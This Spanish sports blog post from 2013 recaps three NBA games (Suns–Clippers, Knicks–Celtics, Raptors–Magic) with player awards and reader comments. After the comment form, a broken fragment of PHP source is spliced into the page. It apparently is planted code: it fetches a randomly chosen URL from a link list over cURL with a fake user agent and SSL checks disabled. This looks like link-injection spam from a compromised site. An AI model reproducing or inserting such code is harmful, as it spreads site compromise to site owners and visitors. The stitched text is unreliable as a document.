La Crónica: Soluciones varias

25 de January de 2013 por Viva_Dirk

Tres partidos nos deja la noche de ayer, con peleas en distintos frentes y una sorpresa.

Victoria sorprendente de los Suns sobre unos Clippers que empiezan a echar de menos a Chris Paul (88-93). Dragic sacó del partido a Bledsoe en 29 minutos que fueron los que tardó este en hacer 6 faltas. El balcánico lanzó 14 tiros libres y se fue hasta los 24 puntos y estuvo muy bien secundado por el trío de pívots tan variopinto que tienen los de Phoenix. En los Clippers aunque Bledsoe acabó con buenos números no maneja el equipo como lo hace Paul. El único que funcionó como siempre fue Crawford pero Griffin lanzó solo 9 veces a canasta y además tuvo un día nefasto desde la linea de personal con un 2 de 8.

Los Knicks se llevaron la victoria del Garden con sus señas de identidad de esta campaña. Controlaron los tableros y perdieron poquísimos balones, lo que unido al gran rendimiento de Carmelo, a la aportación de Stoudemire y el castigo al que somete Chandler a cada uno de sus pares (ayer Garnett) da para ganar en cualquier sitio (89-86). Rondo consiguió un nuevo triple doble pero a los Celtics les faltó una mejor versión de Garnett y un mínimo de acierto desde el perímetro para amarrar el partido. Con un 3 de 18 en triples es muy difícil ganar a unos de los equipos que mejor defiende su zona de toda la liga.

En Orlando los Raptors se llevaron el partido gracias a un gran acierto en la zona, tanto de sus pívots como de los aleros. DeRozan hizo un buen partido con buzzer beater ganador (así que ahora toca uno malo) y la pareja Davis-Johnson hace un buen trabajo cada noche. En el caso de Amir lo de ayer fue brillante. Los Magic gozaron de un gran acierto en el triple y un buen partido de su quinteto pero una pobrísima aportación del banquillo (97-95). Los Raptors deberían plantearse si pueden mejorar traspasando a sus piezas mas frágiles viendo como responde el resto. 

PREMIOS

MVP: Premio para Goran Dragic que con sus 24 puntos, 5 rebotes y 8 asistencias no dejó que la victoria se les escapara a los Suns ante uno de los cocos de la competición. Carmelo Anthony fue el mejor de los suyos con 28 puntos y 9 rebotes. Gran partido de DeMar DeRozan con 22 puntos, 4 rebotes y 7 asistencias y tampoco se queda muy atrás Amir Johnson con 21-10 y 3 tapones.

Rookie: Terrence Ross ayudó a su equipo con 10 puntos. Pablo Prigioni anotó 6 puntos y repartió 4 asistencias en 15 minutos.

Sorpresa: Buen partido un día más de Alan Anderson ejerciendo de 6º hombre con 13 puntos, 4 rebotes y 3 asistencias. Ya vamos viendo una mejor version de Amare Stoudemire. 15 puntos y 9 rebotes desde el banco.

Decepción: JR Smith anotó solo 3 de sus 16 lanzamientos y Jason Terry 1 de 6.

Esfuerzo en vano: Nikola Vucevic disfrutó de lo que empieza a parecer ‘otro dia en la oficina’, 19 puntos, 14 rebotes y 3 rebotes para el máximo candidato a MIP. Premio, sin embargo, para Rajon Rondo al que su triple doble, 20-10-11 no le sirvió para ganar a los Knicks.

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    No entiendo que mierda de 3+1 le pitan a Redick… ¿falta de tiro? había tirado al menos 7 décimas antes de recibir la falta…

      Citar

  2. Jose Luis dice:
    #2

    En el resumen de nba.com puede verse, es en el último cuarto. Ninguno de los equipos de anoche llegó a los 100 puntos, curioso.

      Citar

  3. Jose Luis dice:
    #3

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>